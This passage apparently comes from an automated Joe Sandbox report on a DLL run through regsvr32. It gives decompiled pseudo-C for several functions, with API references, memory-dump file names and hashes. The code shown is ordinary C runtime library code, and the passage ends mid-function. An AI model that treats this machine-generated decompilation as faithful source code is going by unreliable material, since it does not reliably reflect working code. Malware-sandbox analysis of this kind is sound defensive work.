				E6E9EC407( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6e9fd638 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x6e9fc760; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6e9fd638 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E6E9F169D( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x6e9fc760)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x6e9fd638 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E6E9E9DB0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x6e9fd638 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6E9F169D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E6E9EFCA5(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E6E9F02C6(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E6E9EE7D9( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E6E9EE7D9();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6E9E9ADF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x6e9f092c
0x6e9f0933
0x6e9f0936
0x6e9f093e
0x6e9f0941
0x6e9f094e
0x6e9f0951
0x6e9f0954
0x6e9f095b
0x6e9f0963
0x6e9f0966
0x6e9f0969
0x6e9f096f
0x6e9f0971
0x6e9f0978
0x6e9f0982
0x6e9f0984
0x6e9f0987
0x6e9f098a
0x6e9f098d
0x6e9f0990
0x6e9f0993
0x6e9f0999
0x6e9f0ca4
0x6e9f0ca4
0x00000000
0x6e9f099f
0x6e9f09a7
0x6e9f09aa
0x6e9f09b0
0x6e9f09b3
0x6e9f09ba
0x6e9f09c1
0x6e9f09c4
0x00000000
0x00000000
0x6e9f09cd
0x6e9f09d2
0x6e9f09d4
0x6e9f09d7
0x6e9f09dc
0x6e9f09e0
0x00000000
0x00000000
0x00000000
0x6e9f09e0
0x6e9f09e5
0x6e9f09e7
0x6e9f09ec
0x6e9f0aa6
0x6e9f0aad
0x6e9f0aae
0x6e9f0ab1
0x6e9f0ab3
0x6e9f0c57
0x6e9f0c59
0x00000000
0x6e9f0c5b
0x6e9f0c5b
0x6e9f0c5e
0x6e9f0c6d
0x6e9f0c71
0x6e9f0c72
0x6e9f0c72
0x00000000
0x6e9f0c76
0x6e9f0ab9
0x6e9f0abb
0x6e9f0ac1
0x6e9f0ac4
0x6e9f0ad0
0x6e9f0ad9
0x6e9f0ae4
0x6e9f0ae9
0x6e9f0aec
0x6e9f0aef
0x00000000
0x6e9f0af5
0x6e9f0af5
0x00000000
0x6e9f0af5
0x6e9f0aef
0x6e9f09f2
0x6e9f0a01
0x6e9f0a02
0x6e9f0a05
0x6e9f0a08
0x6e9f0a0d
0x6e9f0c23
0x6e9f0c25
0x6e9f0c27
0x6e9f0c29
0x6e9f0c33
0x6e9f0c3b
0x6e9f0c3d
0x6e9f0c3e
0x6e9f0c42
0x6e9f0c45
0x6e9f0c45
0x6e9f0c49
0x6e9f0c49
0x6e9f0c49
0x6e9f0c4c
0x6e9f0c4c
0x6e9f0c4c
0x6e9f0c4e
0x6e9f0c4e
0x6e9f0c52
0x6e9f0a13
0x6e9f0a13
0x6e9f0a16
0x6e9f0a18
0x6e9f0a1b
0x6e9f0a1e
0x6e9f0a22
0x6e9f0a23
0x6e9f0a27
0x6e9f0a2a
0x6e9f0a2f
0x6e9f0a39
0x6e9f0a3e
0x6e9f0a41
0x6e9f0a44
0x6e9f0a44
0x6e9f0a47
0x6e9f0a4a
0x6e9f0a4c
0x6e9f0a55
0x6e9f0a59
0x6e9f0a5a
0x6e9f0a5e
0x6e9f0a64
0x6e9f0a6d
0x6e9f0a7a
0x6e9f0a81
0x6e9f0a85
0x6e9f0a90
0x6e9f0a95
0x6e9f0a9b
0x00000000
0x6e9f0aa1
0x6e9f0af8
0x6e9f0af9
0x6e9f0b7c
0x6e9f0b83
0x6e9f0b8b
0x6e9f0b93
0x6e9f0b98
0x6e9f0b9b
0x6e9f0ba0
0x00000000
0x6e9f0ba6
0x6e9f0bbb
0x6e9f0c9b
0x6e9f0ca1
0x00000000
0x6e9f0bc1
0x6e9f0bca
0x6e9f0bcc
0x6e9f0bd2
0x00000000
0x6e9f0bd8
0x6e9f0bdc
0x6e9f0c12
0x6e9f0c15
0x00000000
0x6e9f0c1b
0x6e9f0c1b
0x00000000
0x6e9f0c1b
0x6e9f0bde
0x6e9f0be0
0x6e9f0be2
0x6e9f0bfb
0x00000000
0x6e9f0c01
0x6e9f0c05
0x00000000
0x6e9f0c0b
0x6e9f0c0b
0x6e9f0c0e
0x6e9f0c0f
0x00000000
0x6e9f0c0f
0x6e9f0c05
0x6e9f0bfb
0x6e9f0bdc
0x6e9f0bd2
0x6e9f0bbb
0x6e9f0ba0
0x6e9f0a9b
0x6e9f0a0d
0x00000000
0x6e9f0afd
0x6e9f0afd
0x6e9f0b01
0x6e9f0b04
0x6e9f0b26
0x6e9f0b29
0x6e9f0b2e
0x6e9f0b32
0x6e9f0b36
0x6e9f0b64
0x6e9f0b66
0x00000000
0x6e9f0b38
0x6e9f0b38
0x6e9f0b38
0x6e9f0b3b
0x6e9f0b3e
0x6e9f0b41
0x6e9f0c78
0x6e9f0c7b
0x6e9f0c7e
0x6e9f0c88
0x6e9f0c93
0x6e9f0c98
0x00000000
0x6e9f0b47
0x6e9f0b4e
0x6e9f0b53
0x6e9f0b56
0x6e9f0b59
0x00000000
0x6e9f0b5f
0x6e9f0b5f
0x00000000
0x6e9f0b5f
0x6e9f0b59
0x6e9f0b41
0x6e9f0b06
0x6e9f0b0a
0x6e9f0b0d
0x6e9f0b12
0x6e9f0b18
0x6e9f0b1a
0x6e9f0b21
0x6e9f0b67
0x6e9f0b6a
0x6e9f0b6b
0x6e9f0b70
0x6e9f0b73
0x6e9f0b76
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f0b76
0x00000000
0x6e9f0b04
0x6e9f099f
0x6e9f0ca7
0x6e9f0ca7
0x6e9f0ca9
0x6e9f0cac
0x6e9f0cac
0x6e9f0cac
0x6e9f0cac
0x6e9f0cbe
0x6e9f0cc0
0x6e9f0cc1
0x6e9f0cc2
0x6e9f0ccc

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6E9F0969
__fassign.LIBCMT ref: 6E9F0B4E
__fassign.LIBCMT ref: 6E9F0B6B
WriteFile.KERNEL32(?,6E9EE286,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E9F0BB3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E9F0BF3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E9F0C9B

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: b833e4030bc1bfa1df609b419c7c8dabe70ec27cc256bebc99252f4372e43a6c
Instruction ID: 3eae60b5d78e60e4841c69526ff082b3065ccf398e2371a6c8a70d72337de221
Opcode Fuzzy Hash: b833e4030bc1bfa1df609b419c7c8dabe70ec27cc256bebc99252f4372e43a6c
Instruction Fuzzy Hash: DAC18A75D04299DFDB01CFE8C9909EDBBB9AF49314F28416AE859BB341E231D942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EAD94 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E9EAD94(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6e9fc030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6E9EBF60(_t13, __eflags,  *0x6e9fc030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E9EBF9B(_t14, __eflags,  *0x6e9fc030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E9ED58B();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E9EBF9B(_t18, __eflags,  *0x6e9fc030, 0);
								} else {
									_t8 = E6E9EBF9B(_t18, __eflags,  *0x6e9fc030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E9EC2B0(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x6e9ead94
0x6e9ead9b
0x6e9eadae
0x6e9eadb5
0x6e9eadb7
0x6e9eadb8
0x6e9eadbb
0x6e9eadd4
0x6e9eadd4
0x6e9eadbd
0x6e9eadbd
0x6e9eadbf
0x6e9eadc9
0x6e9eadd0
0x6e9eadd2
0x6e9eadd9
0x6e9eade2
0x6e9eade5
0x6e9eade6
0x6e9eade8
0x6e9eadfc
0x6e9eadfc
0x6e9eae05
0x6e9eadea
0x6e9eadf1
0x6e9eadf7
0x6e9eadf8
0x6e9eadfa
0x6e9eae0e
0x6e9eae10
0x6e9eae10
0x00000000
0x00000000
0x00000000
0x6e9eadfa
0x6e9eae13
0x00000000
0x00000000
0x00000000
0x6e9eadd2
0x6e9eadbf
0x6e9eae1b
0x6e9eae25
0x6e9ead9d
0x6e9ead9f
0x6e9ead9f

APIs

GetLastError.KERNEL32(00000001,?,6E9EA952,6E9E8F01,6E9E92CE,?,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618,0000000C,6E9E95FF), ref: 6E9EADA2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E9EADB0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E9EADC9
SetLastError.KERNEL32(00000000,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618,0000000C,6E9E95FF,?,00000001,?), ref: 6E9EAE1B

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f644cac3cde2138cc56ac671bdaa34447043f11cb7d0eef2f3cb032f4cc9b7d3
Instruction ID: a08299f0d3fe9d099f2b7ba85a068d092dde37482075a5219591980b5d139d1b
Opcode Fuzzy Hash: f644cac3cde2138cc56ac671bdaa34447043f11cb7d0eef2f3cb032f4cc9b7d3
Instruction Fuzzy Hash: A401687211DB125EAB1719F47C8064B2B7CEF62A7D320062DF720598E4EF91C8425D48

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EF217 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9EF217(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6E9EFCA5(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6E9EFCA5(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6E9ED437(GetLastError());
									_t17 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6E9EF2DE(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6E9ED437(GetLastError());
						_t17 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6E9EF2DE(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6E9EF305(_a8);
				return 0;
			}

0x6e9ef21d
0x6e9ef222
0x6e9ef236
0x6e9ef239
0x6e9ef26b
0x6e9ef273
0x6e9ef275
0x6e9ef28e
0x6e9ef291
0x6e9ef294
0x6e9ef2a2
0x6e9ef2b1
0x6e9ef2b9
0x6e9ef2bb
0x6e9ef2d4
0x6e9ef2d7
0x6e9ef2d7
0x6e9ef2bd
0x6e9ef2c4
0x6e9ef2cf
0x6e9ef2cf
0x6e9ef2d9
0x6e9ef2da
0x00000000
0x6e9ef2da
0x6e9ef299
0x6e9ef29e
0x6e9ef2a0
0x00000000
0x00000000
0x00000000
0x6e9ef2a0
0x6e9ef27e
0x6e9ef289
0x00000000
0x6e9ef289
0x6e9ef23b
0x6e9ef23e
0x6e9ef241
0x6e9ef254
0x6e9ef257
0x6e9ef259
0x6e9ef25b
0x00000000
0x6e9ef25b
0x6e9ef247
0x6e9ef24c
0x6e9ef24e
0x00000000
0x00000000
0x00000000
0x6e9ef24e
0x6e9ef227
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6E9EF21C

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 131329eb8816c7cee174bc609df7efb85e8eabe30fe74ab0ba29b6c91733c7a7
Instruction ID: b0995af1a6d7e798c17c290bf85a6399c1d5a9b62cb3d140d595492cf179ea5a
Opcode Fuzzy Hash: 131329eb8816c7cee174bc609df7efb85e8eabe30fe74ab0ba29b6c91733c7a7
Instruction Fuzzy Hash: 4221A175604605AFA7029FF5AC40D86776CEF9136C7208916EA3996F80E731EC008EA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EBE07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EBE07(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e9fd3ec + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e9f5e38 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E9ED618(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6e9ebe0e
0x6e9ebe82
0x6e9ebe13
0x6e9ebe15
0x6e9ebe1c
0x6e9ebe20
0x6e9ebe29
0x6e9ebe38
0x6e9ebe41
0x6e9ebe45
0x6e9ebe8e
0x6e9ebe90
0x6e9ebe94
0x6e9ebe97
0x6e9ebe97
0x6e9ebe9d
0x6e9ebe9d
0x6e9ebe89
0x6e9ebe8d
0x6e9ebe8d
0x6e9ebe47
0x6e9ebe50
0x6e9ebe7a
0x6e9ebe7d
0x6e9ebe7f
0x6e9ebe7f
0x00000000
0x6e9ebe7f
0x6e9ebe52
0x6e9ebe5d
0x6e9ebe62
0x6e9ebe67
0x00000000
0x00000000
0x6e9ebe6e
0x6e9ebe74
0x6e9ebe78
0x00000000
0x00000000
0x00000000
0x6e9ebe78
0x6e9ebe25
0x00000000
0x00000000
0x00000000
0x6e9ebe27
0x6e9ebe87
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E9EBEC8,00000000,?,00000001,00000000,?,6E9EBF3F,00000001,FlsFree,6E9F5EF4,FlsFree,00000000), ref: 6E9EBE97

Strings

api-ms-, xrefs: 6E9EBE57

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: b2c7625d1bfe89fb478ca0a88502f0e83c0b679aa96f6a4d2351191b6a295008
Instruction ID: 5f3587cbcc2c5801bae0dc8d3c262c3b49f641da6bc8ce5ea98df00014e845f3
Opcode Fuzzy Hash: b2c7625d1bfe89fb478ca0a88502f0e83c0b679aa96f6a4d2351191b6a295008
Instruction Fuzzy Hash: B111A732A45B21BBDB734AA8AC54B4D37B8AF02760F154554FB15E7688E760ED008ED0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC8EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E6E9EC8EA(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6e9f51b8(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6e9ec8f0
0x6e9ec8f4
0x6e9ec8ff
0x6e9ec907
0x6e9ec912
0x6e9ec918
0x6e9ec91c
0x6e9ec923
0x6e9ec929
0x6e9ec929
0x6e9ec92b
0x6e9ec930
0x00000000
0x6e9ec935
0x6e9ec93c

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E9EC89C,?,?,6E9EC864,?,00000001,?), ref: 6E9EC8FF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E9EC912
FreeLibrary.KERNEL32(00000000,?,?,6E9EC89C,?,?,6E9EC864,?,00000001,?), ref: 6E9EC935

Strings

CorExitProcess, xrefs: 6E9EC90A
mscoree.dll, xrefs: 6E9EC8F8

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 03c6f88bb5767ad83f70285aef151ba45498a54cc0f19bd6e0f6c72f5ca8aaa3
Instruction ID: af51d2082a6820cd2bb1570d1c396cdb3afb29179ce201945b192d02d88be5bd
Opcode Fuzzy Hash: 03c6f88bb5767ad83f70285aef151ba45498a54cc0f19bd6e0f6c72f5ca8aaa3
Instruction Fuzzy Hash: 9BF08C30605619FBDF02AB91DC19B9E7FAAEF49759F108060F942A5150CB30DE41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F190B Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9F190B(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e9fc708; // 0x6e9fc758
					if(_t23 != 0) {
						E6E9EDC0E(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e9fc70c; // 0x6e9fd9f4
					if(_t24 != 0) {
						E6E9EDC0E(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e9fc710; // 0x6e9fd9f4
					if(_t25 != 0) {
						E6E9EDC0E(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e9fc738; // 0x6e9fc75c
					if(_t26 != 0) {
